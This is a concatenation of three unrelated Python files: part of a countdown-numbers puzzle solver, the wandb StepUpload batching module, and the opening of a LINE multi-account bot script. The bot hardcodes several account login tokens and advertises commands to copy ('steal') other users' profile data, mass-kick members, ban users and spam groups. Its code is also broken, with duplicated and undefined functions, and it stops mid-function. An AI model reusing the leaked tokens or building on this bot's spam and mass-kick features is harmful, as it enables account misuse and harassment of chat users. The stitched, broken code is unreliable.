yield subset
if avoid_dups:
seen.add(sset)
if max_size is None or len(subset) + 1 <= max_size:
new = (lst[0],) + subset
if avoid_dups:
sset = tuple(sorted((new)))
if not avoid_dups or sset not in seen:
yield new
if avoid_dups:
seen.add(sset)
def get_partitions(lst):
"""
>>> [p for p in get_partitions([])]
[]
>>> [p for p in get_partitions([1])]
[]
>>> [p for p in get_partitions(range(2))]
[([0], [1])]
>>> [p for p in get_partitions(range(3))]
[([0], [1, 2]), ([0, 1], [2])]
>>> [p for p in get_partitions(range(4))]
[([0], [1, 2, 3]), ([0, 1], [2, 3]), ([0, 1, 2], [3])]
"""
for ii in xrange(1, len(lst)):
yield lst[:ii], lst[ii:]
def permutations(lst, avoid_dups=False):
"""
>>> import itertools
>>> [p for p in permutations(())]
[()]
>>> [p for p in permutations((1,))]
[(1,)]
>>> [p for p in permutations((1, 2))]
[(1, 2), (2, 1)]
>>> [p for p in permutations((1, 2, 3))]
[(1, 2, 3), (1, 3, 2), (2, 1, 3), (2, 3, 1), (3, 1, 2), (3, 2, 1)]
>>> [p for p in permutations((1, 1), avoid_dups=True)]
[(1, 1)]
>>> [p for p in permutations((1, 1, 2), avoid_dups=True)]
[(1, 1, 2), (1, 2, 1), (2, 1, 1)]
>>> comp = lambda lst: set(p for p in permutations(lst)) == set(p for p in itertools.permutations(lst))
>>> comp(tuple(range(3)))
True
>>> comp(tuple(range(4)))
True
>>> comp(tuple(range(5)))
True
"""
if len(lst) == 0:
yield lst
return
seen = set()
for (ii, elt) in enumerate(lst):
if avoid_dups:
if elt in seen:
continue
else:
seen.add(elt)
for perm in permutations(lst[:ii] + lst[ii+1:], avoid_dups=avoid_dups):
yield (elt,) + perm
def get_splits(vals, all_orders=False, all_subsets=False, avoid_dups=True):
"""
>>> [s for s in get_splits((), all_orders=True, all_subsets=True)]
[]
>>> [s for s in get_splits(tuple(range(1)), all_orders=True, all_subsets=True)]
[]
>>> [s for s in get_splits(tuple(range(2)), all_orders=True, all_subsets=True)]
[((0,), (1,)), ((1,), (0,))]
>>> sorted(s for s in get_splits(tuple(range(3)), all_orders=True, all_subsets=True, avoid_dups=True))
[((0,), (1,)), ((0,), (1, 2)), ((0,), (2,)), ((0,), (2, 1)), ((0, 1), (2,)), ((0, 2), (1,)), ((1,), (0,)), ((1,), (0, 2)), ((1,), (2,)), ((1,), (2, 0)), ((1, 0), (2,)), ((1, 2), (0,)), ((2,), (0,)), ((2,), (0, 1)), ((2,), (1,)), ((2,), (1, 0)), ((2, 0), (1,)), ((2, 1), (0,))]
"""
import itertools
if all_subsets:
subsets = (s for s in get_subsets(vals)
if len(s) > 0)
else:
subsets = (vals,)
if all_orders:
perms = (p
for s in subsets
for p in permutations(s, avoid_dups=avoid_dups))
if avoid_dups:
perms = set(perms)
else:
perms = subsets
return itertools.chain.from_iterable(
get_partitions(p) for p in perms)
def all_expressions(vals, all_orders=False, all_subsets=False, use_pow=False):
"""
@param vals: a list of Value or Expr objects.
"""
if len(vals) == 1:
yield vals[0]
return
if all_orders and all_subsets:
logging.debug("Vals: {0}".format(vals))
splits = get_splits(
vals, all_orders=all_orders, all_subsets=all_subsets)
for (lpart, rpart) in splits:
if all_orders and all_subsets:
logging.debug("Doing split {0} v {1}".format(lpart, rpart))
for left in all_expressions(lpart, use_pow=use_pow):
if left.exception:
continue
for right in all_expressions(rpart, use_pow=use_pow):
if right.exception:
continue
for op in Operators.all(use_pow=use_pow):
expr = BiExpr.get_expr(op, left, right)
if not expr.exception:
yield expr
# if not op.commutative:
# expr = BiExpr.get_expr(op, right, left)
# if not expr.exception:
# yield expr
def countdown(vals, target, all_orders=True, all_subsets=True, use_pow=False):
"""
If all_orders is False, then the numbers must be used in the order
given. I.e., if you give the numbers 1, 2, 3, 4, 5, 6, 7, 8, 9
and want to make 100 and all_orders is False, then
((1 + (2 / 3)) / (((4 / 5) / 6) / 8)) = 100.0
is ok, but
(9 - (5 - (7 / ((2 - (1 / 4)) / (8 * (6 - 3)))))) = 100.0
is not.
if all_subsets is False, then you have to use every digit, so
(1 - (2 * (3 * (4 * (5 + (((6 - 7) / 8) - 9)))))) = 100.0
is ok, but
((1 + (2 / 3)) / (((4 / 5) / 6) / 8)) = 100.0
is not.
"""
vals = tuple(Value(v) for v in vals)
closest = []
best = None
tries = 0
tried = set()
for expr in all_expressions(vals,
all_orders=all_orders,
all_subsets=all_subsets,
use_pow=use_pow):
if str(expr) in tried:
logging.error("Tried the same expression twice: {0}".format(expr))
continue
tried.add(str(expr))
tries += 1
value = try_round(expr.value)
distance = abs(target - value)
logging.debug("Trying {0} = {1}, abs({2} - {1}) = {3}".format(
expr, value, target, distance))
if len(closest) == 0:
closest.append(expr)
best = distance
elif distance < best:
logging.info(
"Found {0} = {1}, distance = abs({2} - {1}) = {3} < {4}".format(
expr, value, target, distance, best))
closest = [expr]
best = distance
elif distance == best:
logging.debug(
"Found {0} = {1}, distance = abs({2} - {1}) = {3} = {4}".format(
expr, value, target, distance, best))
closest.append(expr)
if distance == 0:
yield expr
if tries % 1000000 == 0:
logging.info("{0} expressions tried so far".format(tries))
logging.info("Tried {0} expressions".format(tries))
if best != 0:
for c in closest:
yield c
# --------------------------------------------------------------------------- #
if __name__ == "__main__":
main()
# --------------------------------------------------------------------------- #
|
step_upload.py
|
"""Batching file prepare requests to our API."""
import collections
import threading
from six.moves import queue
from wandb.filesync import upload_job
from wandb.errors.term import termerror
RequestUpload = collections.namedtuple(
"EventStartUploadJob",
("path", "save_name", "artifact_id", "md5", "copied", "save_fn", "digest"),
)
RequestCommitArtifact = collections.namedtuple(
"RequestCommitArtifact", ("artifact_id", "finalize", "before_commit", "on_commit")
)
RequestFinish = collections.namedtuple("RequestFinish", ())
class StepUpload(object):
def __init__(self, api, stats, event_queue, max_jobs, silent=False):
self._api = api
self._stats = stats
self._event_queue = event_queue
self._max_jobs = max_jobs
self._thread = threading.Thread(target=self._thread_body)
self._thread.daemon = True
# Indexed by files' `save_name`'s, which are their ID's in the Run.
self._running_jobs = {}
self._pending_jobs = []
self._artifacts = {}
self._finished = False
self.silent = silent
def _thread_body(self):
# Wait for event in the queue, and process one by one until a
# finish event is received
while True:
event = self._event_queue.get()
if isinstance(event, RequestFinish):
break
self._handle_event(event)
# We've received a finish event. At this point, further Upload requests
# are invalid. Mark that we're done, which is used to tell the last
# upload job that it is last.
self._finished = True
# After a finish event is received, iterate through the event queue
# one by one and process all remaining events.
while True:
try:
event = self._event_queue.get(True, 0.2)
except queue.Empty:
event = None
if event:
self._handle_event(event)
elif not self._running_jobs:
# Queue was empty and no jobs left.
break
def _handle_event(self, event):
if isinstance(event, upload_job.EventJobDone):
job = event.job
job.join()
if job.artifact_id:
if event.success:
self._artifacts[job.artifact_id]["pending_count"] -= 1
self._maybe_commit_artifact(job.artifact_id)
else:
termerror(
"Uploading artifact file failed. Artifact won't be committed."
)
self._running_jobs.pop(job.save_name)
# If we have any pending jobs, start one now
if self._pending_jobs:
event = self._pending_jobs.pop(0)
self._start_upload_job(event)
elif isinstance(event, RequestCommitArtifact):
if event.artifact_id not in self._artifacts:
self._init_artifact(event.artifact_id)
self._artifacts[event.artifact_id]["commit_requested"] = True
self._artifacts[event.artifact_id]["finalize"] = event.finalize
if event.before_commit:
self._artifacts[event.artifact_id]["pre_commit_callbacks"].add(
event.before_commit
)
if event.on_commit:
self._artifacts[event.artifact_id]["post_commit_callbacks"].add(
event.on_commit
)
self._maybe_commit_artifact(event.artifact_id)
elif isinstance(event, RequestUpload):
if event.artifact_id is not None:
if event.artifact_id not in self._artifacts:
self._init_artifact(event.artifact_id)
self._artifacts[event.artifact_id]["pending_count"] += 1
if len(self._running_jobs) == self._max_jobs:
self._pending_jobs.append(event)
else:
self._start_upload_job(event)
else:
raise Exception("Programming error: unhandled event: %s" % str(event))
def _start_upload_job(self, event):
if not isinstance(event, RequestUpload):
raise Exception("Programming error: invalid event")
# Operations on a single backend file must be serialized. If
# we're already uploading this file, put the event at the
# end of the queue.
if event.save_name in self._running_jobs:
self._pending_jobs.append(event)
return
# Start it.
job = upload_job.UploadJob(
self._event_queue,
self._stats,
self._api,
self.silent,
event.save_name,
event.path,
event.artifact_id,
event.md5,
event.copied,
event.save_fn,
event.digest,
)
self._running_jobs[event.save_name] = job
job.start()
def _init_artifact(self, artifact_id):
self._artifacts[artifact_id] = {
"pending_count": 0,
"commit_requested": False,
"pre_commit_callbacks": set(),
"post_commit_callbacks": set(),
}
def _maybe_commit_artifact(self, artifact_id):
artifact_status = self._artifacts[artifact_id]
if (
artifact_status["pending_count"] == 0
and artifact_status["commit_requested"]
):
for callback in artifact_status["pre_commit_callbacks"]:
callback()
if artifact_status["finalize"]:
self._api.commit_artifact(artifact_id)
for callback in artifact_status["post_commit_callbacks"]:
callback()
def start(self):
self._thread.start()
def is_alive(self):
return self._thread.is_alive()
def finish(self):
# Restored from its use in shutdown(): tell the worker thread to drain remaining events and stop.
self._event_queue.put(RequestFinish())
def shutdown(self):
self.finish()
self._thread.join()
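# Hedged usage sketch (not part of the wandb module): shows the intended
# lifecycle of StepUpload -- start the worker thread, feed it Request* events
# through the shared queue, then shut it down, which drains remaining events.
# _NoopApi is a hypothetical stand-in for the real api object.
def _step_upload_demo():
    class _NoopApi(object):
        def commit_artifact(self, artifact_id):
            pass

    event_queue = queue.Queue()
    step = StepUpload(_NoopApi(), stats=None, event_queue=event_queue,
                      max_jobs=4, silent=True)
    step.start()
    # RequestUpload / RequestCommitArtifact events would normally go here.
    step.shutdown()  # enqueues RequestFinish and joins the worker thread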
|
cil.py
|
# -*- coding: utf-8 -*-
# new
import Acil
from Acil.lib.curve.ttypes import *
from datetime import datetime
from PyDictionary import PyDictionary
from bs4 import BeautifulSoup
from mergedict import MergeDict
from mergedict import ConfigDict
from gtts import gTTS
from pyowm import OWM
from enum import Enum
from django.http import HttpResponse
from flask import Flask, send_from_directory, redirect as redirect_flask, render_template
from random import randint
import time, random, sys, re, os, json
import subprocess, threading, string,codecs, requests, tweepy, ctypes, urllib, urllib2, wikipedia,cookielib,urllib3
import urllib3
import certifi
import ssl
import html5lib,shutil
import subprocess as cmd
import csv
import os
import errno
import imp
import StringIO
import traceback
import linecache
import stat
import cStringIO
import urlparse
import logging
import argparse
#import mimic
import xml
import base64
import ast
cl = Acil.LINE()
cl.login(token="EnOhPKGkwimXJ8iVuIv5.nqZhqiZgZilGvU4eyth5jq.iV+ciJ+WAZnNjnVY0O8nKYgN1+R6664CfqfnUEnaGW8=")
cl.loginResult()
kt = Acil.LINE()
kt.login(token="EnOhPKGkwimXJ8iVuIv5.nqZhqiZgZilGvU4eyth5jq.iV+ciJ+WAZnNjnVY0O8nKYgN1+R6664CfqfnUEnaGW8=")
kt.loginResult()
ks = Acil.LINE()
ks.login(token="EnlRYqL4DlWKIr9dfIU2.WUI0jVzzeewupQ5tboz8mG.K5G366kQX+YWWdGRGXAwMU2rHcF2hhu0Lm3JmSNUPKI=")
ks.loginResult()
ki = Acil.LINE()
ki.login(token="En8i8ZAR1hsJLRcqWJB7.7aNdCEtbMUaAO9Hiv0qoTW.WOSasGBkESFnM7P/TCYn6cTcF2U7Lgr396M1Yt/z8qo=")
ki.loginResult()
kk = Acil.LINE()
kk.login(token="EnrNejwvrgZlyCoYjSdc.SJRuNecAXNC8sHurfor2ha.jD7wclOBbItb9PXfzVA4BhBq5AkfkfdpkQBVbAigijw=")
kk.loginResult()
kc = Acil.LINE()
kc.login(token="EnXJYMPRuZKWp81hPsk2.buJLD7JrrngDnMf5qDfqyG.60g8dV2Qm2DALXdsVgdjfN7PLoRXoNEm9dLRphHFgjM=")
kc.loginResult()
print "Acil"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage= """\n
▂▃▅▇█▓▒░✴✴(iɥpɐƃuɐqɐq)
═╬════════►∆∆
✴✴(iɥpɐƃuɐqɐq)
═╬════════►
🔘 My name : |╬|
🔘 Bot2 rename: |╬|
🔘 Bot3 rename: |╬|
🔘 Bot4 rename: |╬|
🔘 Bot5 rename: |╬|
🔘 Bot6 rename: |╬|
🔘 All rename: |╬|
🔘 Allbio: |╬|
🔘 My clone @ |╬|
🔘 Bot2 clone @ |╬|
🔘 Bot3 clone @ |╬|
🔘 Bot4 clone @ |╬|
🔘 Bot5 clone @ |╬|
🔘 Bot6 clone @ |╬|
🔘 Comment: |╬|
🔘 Message: |╬|
🔘 Bot1-6 backup |╬|
🔘 Bot1-6 backup |╬|
🔘 Group name: |╬|
═╬════════►∆∆
🔓D̸͟͞e̸͟͞m̸͟͞o̸͟͞t̸͟͞e̸͟͞d̸͟͞.🔓
═╬════════►
|╬| Admin on @
|╬| Expel on @
|╬| Expelal
═╬════════►
📷S̸͟͞T̸͟͞E̸͟͞A̸͟͞L̸͟͞I̸͟͞N̸͟͞G̸͟͞📷
═╬════════►
|╬| Steal
|╬| Steal name @
|╬| Steal Bio @
|╬| Steal status @
|╬| Steal mid @
|╬| Steal contact @
|╬| Steal cover @
|╬| Steal pict @
|╬| Steal group pict
|╬| Midpict: [mid]
|╬| Pict group [name]
|╬| My pict
|╬| My cover
|╬| My name
|╬| My bio
|╬| Pap set:
|╬| Pap
|╬| Image [Text]
═╬════════►
🔐S̸͟͞E̸͟͞C̸͟͞U̸͟͞R̸͟͞Y̸͟͞I̸͟͞T̸͟͞Y̸͟͞🔐
═╬════════►
|╬| Protect:low
|╬| Protect:hight
═╬════════►
🚮L̸͟͞I̸͟͞S̸͟͞T̸͟͞ B̸͟͞A̸͟͞N̸͟͞N̸͟͞E̸͟͞D̸͟͞🚮
═╬════════►
|╬| Ban @
|╬| Unban @
|╬| Banned
|╬| Unbanned
|╬| Ban repeat @
|╬| Add friend @
|╬| Clear banlist
═╬════════►
📲i̲̅n̲̅v̲̅i̲̅t̲̅a̲̅t̲̅i̲̅o̲̅n̲̅📲
═╬════════►
|╬| Invite:[mid]
|╬| Invite user[contact]
|╬| Invite me
|╬| Join all/Masuk
═╬════════►
📴L̸͟͞E̸͟͞A̸͟͞V̸͟͞E̸͟͞ G̸͟͞R̸͟͞O̸͟͞U̸͟͞P̸͟͞📴
═╬════════►
|╬| Bot2 @bye
|╬| Bot3 @bye
|╬| Bot4 @bye
|╬| Bot5 @bye
|╬| Bot6 @bye
|╬| Bye/pulang
|╬| Center @bye
|╬| Bye allgc[own]
═╬════════►
🔫A̸͟͞U̸͟͞T̸͟͞O̸͟͞ S̸͟͞E̸͟͞T̸͟͞ B̸͟͞O̸͟͞T̸͟͞🔫
═╬════════►
|╬| Auto reinvite:on/off
|╬| Auto join:on/off
|╬| Auto leave:on/off
|╬| Auto like:on/off
|╬| Like friend:on/off
|╬| Welcome message:on/off
|╬| Auto notice:on/off
|╬| Blockinvite:on/off
|╬| Auto blockqr:on/off
|╬| Namelock:on/off
|╬| Auto add:on/off
|╬| Check message
|╬| Add message:
|╬| Comment:on/off
|╬| Add comment:
|╬| Check comment
|╬| Backup:on/off
|╬| Gcancel:
|╬| Update welcome:
|╬| Check welcome message
═╬════════►
🚮M̸͟͞O̸͟͞D̸͟͞E̸͟͞ C̸͟͞A̸͟͞N̸͟͞C̸͟͞E̸͟͞L̸͟͞🚮
═╬════════►
|╬| Rejectall
|╬| Clean invites
|╬| Clear invites
═╬════════►
S̸͟͞U̸͟͞R̸͟͞P̸͟͞R̸͟͞I̸͟͞S̸͟͞E̸͟͞ G̸͟͞I̸͟͞F̸͟͞T̸͟͞
═╬════════►
|╬| gift1-15
|╬| Spam gift
|╬| Gift @
═╬════════►
📲N̸͟͞O̸͟͞T̸͟͞I̸͟͞F̸͟͞I̸͟͞C̸͟͞A̸͟͞T̸͟͞I̸͟͞O̸͟͞N̸͟͞ 📲
═╬════════►
|╬| Group list
|╬| Banlist
|╬| Admin list
|╬| Settings
|╬| Ginfo
|╬| TL:[text]
|╬| Miclist
|╬| Micdel @
|╬| Micadd @
═╬════════►
🚮W̸͟͞T̸͟͞F̸͟͞ K̸͟͞I̸͟͞L̸͟͞L̸͟͞ Y̸͟͞O̸͟͞U̸͟͞🚮
═╬════════►
|╬| Cleanse
|╬| Vkick @
|╬| Nk [name]
|╬| Kick:[mid]
|╬| Purge
═╬════════►
💻S̸͟͞P̸͟͞A̸͟͞M͞ S̸͟͞E̸͟͞R̸͟͞V̸͟͞E̸͟͞R̸͟͞💻
═╬════════►
|╬| Spamg[on/off]
|╬| Spam add:
|╬| Spam change:
|╬| Spam start:[number]
|╬| Spam @
|╬| Say a̸͟͞a̸͟͞a̸͟͞
|╬| Me
|╬| Speed
|╬| Debug speed
|╬| My mid
|╬| Gcreator
|╬| Halo
|╬| Bot contact
|╬| Bot mid
|╬| Creator
|╬| System
|╬| Iconfig
|╬| Kernel
|╬| Cpu
|╬| Respon/sname
|╬| Help
|╬| Mc:[mid]
|╬| runtim
|╬| show offenders:on/off
═╬════════►
💻U̸͟͞T̸͟͞I̸͟͞L̸͟͞I̸͟͞T̸͟͞Y̸͟͞💻
═╬════════►
|╬| Lurking
|╬| Lurking result
|╬| Link open
|╬| Link close
|╬| Gurl
|╬| Remove chat
|╬| Bot restart
═╬════════►
💿S̸͟͞E̸͟͞A̸͟͞R̸͟͞C̸͟͞H̸͟͞ C̸͟͞H̸͟͞A̸͟͞T̸͟͞💿
═╬════════►
|╬| Lyric
|╬| Music
|╬| Wiki
|╬| Vidio
|╬| Youtube
|╬| Instagram
|╬| Translate-idn [text]
|╬| Translate-eng [text]
|╬| Translate-thai [text]
|╬| Translate-japan [text]
|╬| Translate-arab [text]
|╬| Translate-korea [text]
|╬| Translate-chin [text]
|╬| Vn-id [text]
|╬| Vn-en [text]
|╬| Vn-jp [text]
|╬| Kalender
|╬| Vn [Text]
|╬| Cek zodiak [Tggl-bulan-tahun]
|╬| Tag on/off
|╬| Emoji [expression]
|╬| Info @[name]
|╬| Ping
|╬| Time
|╬| apakah
|╬| kerang ajaib
|╬| Sticker [expression]
|╬| Mention all
═╬════════►
📣B̸͟͞R̸͟͞O̸͟͞A̸͟͞D̸͟͞C̸͟͞A̸͟͞S̸͟͞T̸͟͞📣
═╬════════►
|╬| Pm cast
|╬| Broadcast
|╬| Spam @[name]
═╬════════►
💻P̸͟͞o̸͟͞w̸͟͞e̸͟͞r̸͟͞💻
═╬════════►
🔘Turn off bots🔘
●▬▬▬▬๑۩Special Thanks۩๑▬▬▬▬▬●
P̸͟͞O̸͟͞W̸͟͞E̸͟͞R̸͟͞ B̸͟͞Y̸͟͞ T̸͟͞C̸͟͞R̸͟͞
Edite ✴✴(iɥpɐƃuɐqɐq)
●▬▬▬▬๑۩TEAM SILUMAN۩๑▬▬▬▬▬●
Creator:by ✴✴(iɥpɐƃuɐqɐq) http://line.me/ti/p/boy29putra
"""
textspeech= """╔═════════════════
║ TEXT TO SPEECH
╠═════════════════
╠➩ 'af' : 'Afrikaans'
╠➩ 'sq' : 'Albanian'
╠➩ 'ar' : 'Arabic'
╠➩ 'hy' : 'Armenian'
╠➩ 'bn' : 'Bengali'
╠➩ 'ca' : 'Catalan'
╠➩ 'zh' : 'Chinese'
╠➩ 'zhcn' : 'Chinese (Mandarin/China)'
╠➩ 'zhtw' : 'Chinese (Mandarin/Taiwan)'
╠➩ 'zhyue' : 'Chinese (Cantonese)'
╠➩ 'hr' : 'Croatian'
╠➩ 'cs' : 'Czech'
╠➩ 'da' : 'Danish'
╠➩ 'nl' : 'Dutch'
╠➩ 'en' : 'English'
╠➩ 'enau' : 'English (Australia)'
╠➩ 'enuk' : 'English (United Kingdom)'
╠➩ 'enus' : 'English (United States)'
╠➩ 'eo' : 'Esperanto'
╠➩ 'fi' : 'Finnish'
╠➩ 'fr' : 'French'
╠➩ 'de' : 'German'
╠➩ 'el' : 'Greek'
╠➩ 'hi' : 'Hindi'
╠➩ 'hu' : 'Hungarian'
╠➩ 'is' : 'Icelandic'
╠➩ 'id' : 'Indonesian'
╠➩ 'it' : 'Italian'
╠➩ 'jp' : 'Japanese'
╠➩ 'km' : 'Khmer (Cambodian)'
╠➩ 'ko' : 'Korean'
╠➩ 'la' : 'Latin'
╠➩ 'lv' : 'Latvian'
╠➩ 'mk' : 'Macedonian'
╠➩ 'no' : 'Norwegian'
╠➩ 'pl' : 'Polish'
╠➩ 'pt' : 'Portuguese'
╠➩ 'ro' : 'Romanian'
╠➩ 'ru' : 'Russian'
╠➩ 'sr' : 'Serbian'
╠➩ 'si' : 'Sinhala'
╠➩ 'sk' : 'Slovak'
╠➩ 'es' : 'Spanish'
╠➩ 'eses' : 'Spanish (Spain)'
╠➩ 'esus' : 'Spanish (United States)'
╠➩ 'sw' : 'Swahili'
╠➩ 'sv' : 'Swedish'
╠➩ 'ta' : 'Tamil'
╠➩ 'th' : 'Thai'
╠➩ 'tr' : 'Turkish'
╠➩ 'uk' : 'Ukrainian'
╠➩ 'vi' : 'Vietnamese'
╠➩ 'cy' : 'Welsh'
╚═════════════════
"""
KAC=[cl,ki,kk,kc,ks,kt]
mid = cl.getProfile().mid   # "u350cc7408cc6cc82e056ee046131f925"
Amid = ki.getProfile().mid  # "ub51bc97c5e4f603f1dff35e9512550d3"
Bmid = kk.getProfile().mid  # "uc2e8b426f6591045943eae5304e67c32"
Cmid = kc.getProfile().mid  # "uec09c371e4c19ae01aa3d84857440eb7"
Dmid = ks.getProfile().mid  # "ub23ad49c409ac6773c4a151114e4761c"
Emid = kt.getProfile().mid  # "u0548e577b8d144d19d36617941d15062"
#Fmid = kl.getProfile().mid
protectname = []
protecturl = []
protection = []
autocancel = {}
autoinvite = []
autoleaveroom = []
targets = []
Bots=[mid,Amid,Bmid,Cmid,Dmid,Emid]
admin = ["u350cc7408cc6cc82e056ee046131f925"]
owner = ["u350cc7408cc6cc82e056ee046131f925"]
wait = {
'contact':False,
'autoJoin':True,
'autoCancel':{"on":True, "members":1},
'leaveRoom':False,
'timeline':True,
'autoAdd':False,
'message':"Thanks for add Me",
"lang":"JP",
"comment":"AutoLike by ✴✴(iɥpɐƃuɐqɐq) http://line.me/ti/p/boy29putra",
"welmsg":"welcome to group",
"commentOn":True,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"status":False,
"likeOn":False,
"pname":False,
"blacklist":{},
"whitelist":{},
"wblacklist":False,
"dblacklist":False,
"qr":False,
"welcomemsg":False,
"Backup":False,
"protectionOn":False,
"winvite":False,
"pnharfbot":{},
"pname":{},
"pro_name":{},
"tag":False,
"autorein":True,
"pelaku":False,
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{},
'copy':False,
'target':{},
'midstarget':{},
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
res = {
'num':{},
'us':{},
'au':{},
}
setTime = {}
setTime = wait2['setTime']
contact = cl.getProfile()
backup = cl.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = ki.getProfile()
backup = ki.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = kk.getProfile()
backup = kk.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = kc.getProfile()
backup = kc.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = ks.getProfile()
backup = ks.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = kt.getProfile()
backup = kt.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
def cms(string, commands): # matches prefixed commands: /XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
tex = ["+","@","/",">",";","^","%","$","サテラ:"]
for texX in tex:
for command in commands:
if string == texX + command:
return True
return False
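# Illustration only: with the prefix handling above, cms() is True only when
# the message carries one of the recognised prefixes, e.g.
#   cms("/speed", ["speed", "ping"])  -> True
#   cms("speed",  ["speed", "ping"])  -> False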
def upload_tempimage(client):
'''
Upload a picture of a kitten. We don't ship one, so get creative!
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
return '%02d hour %02d minute %02d seconds' % (hours, mins, secs)
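# Illustration only: waktu() pretty-prints a duration in seconds, as used by
# the runtime command, e.g.:
#   print(waktu(3725))   # -> "01 hour 02 minute 05 seconds"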
def download_page(url):
version = (3,0)
cur_version = sys.version_info
if cur_version >= version: #If the Current Version of Python is 3.0 or above
import urllib.request #urllib library for Extracting web pages
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
req = urllib.request.Request(url, headers = headers)
resp = urllib.request.urlopen(req)
respData = str(resp.read())
return respData
except Exception as e:
print(str(e))
else: #If the Current Version of Python is 2.x
import urllib2
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
req = urllib2.Request(url, headers = headers)
response = urllib2.urlopen(req)
page = response.read()
return page
except:
return"Page Not found"
#Finding 'Next Image' from the given raw page
def _images_get_next_item(s):
start_line = s.find('rg_di')
if start_line == -1: #If no links are found then give an error!
end_quote = 0
link = "no_links"
return link, end_quote
else:
start_line = s.find('"class="rg_meta"')
start_content = s.find('"ou"',start_line+90)
end_content = s.find(',"ow"',start_content-90)
content_raw = str(s[start_content+6:end_content-1])
return content_raw, end_content
#Getting all links with the help of '_images_get_next_image'
def _images_get_all_items(page):
items = []
while True:
item, end_content = _images_get_next_item(page)
if item == "no_links":
break
else:
items.append(item) #Append all the links in the list named 'Links'
time.sleep(0.1) #Timer could be used to slow down the request for image downloads
page = page[end_content:]
return items
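# Illustration only: the two scraping helpers above are meant to be chained --
# fetch a Google Images result page, then pull the "ou" image URLs out of its
# rg_meta blocks. The query URL below is an assumption, not taken from the bot.
def _image_search_demo(keyword):
    raw_page = download_page("https://www.google.com/search?q="
                             + urllib.quote(keyword) + "&tbm=isch")
    return _images_get_all_items(raw_page)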
def summon(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "Mention"
try:
cl.sendMessage(msg)
except Exception as error:
print error
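# Illustration only: summon() expects a list of member mids and mentions each
# of them in a single message, e.g.
#   summon(msg.to, [member.mid for member in cl.getGroup(msg.to).members])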
def yt(query):
with requests.session() as s:
isi = []
if query == "":
query = "S1B tanysyz"
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
if 'watch?v' in a['href']:
b = a['href'].replace('watch?v=', '')
isi += ['youtu.be' + b]
return isi
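# Illustration only: yt() scrapes the YouTube results page and returns short
# links, e.g. yt("keyword") -> ['youtu.be/VIDEO_ID_1', 'youtu.be/VIDEO_ID_2', ...]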
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def sendMessage(self, messageObject):
return self.Talk.client.sendMessage(0,messageObject)
def sendText(self, Tomid, text):
msg = Message()
msg.to = Tomid
msg.text = text
return self.Talk.client.sendMessage(0, msg)
def sendImage(self, to_, path):
M = Message(to=to_,contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M_id = self._client.sendMessage(M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self._client.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
#r.content
return True
def sendImageWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'w') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except Exception as e:
raise e
def sendText(self, Tomid, text):
msg = Message()
msg.to = Tomid
msg.text = text
def sendMessage(self, messageObject):
return self.Talk.client.sendMessage(0,messageObject)
def post_content(self, urls, data=None, files=None):
return self._session.post(urls, headers=self._headers, data=data, files=files)
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
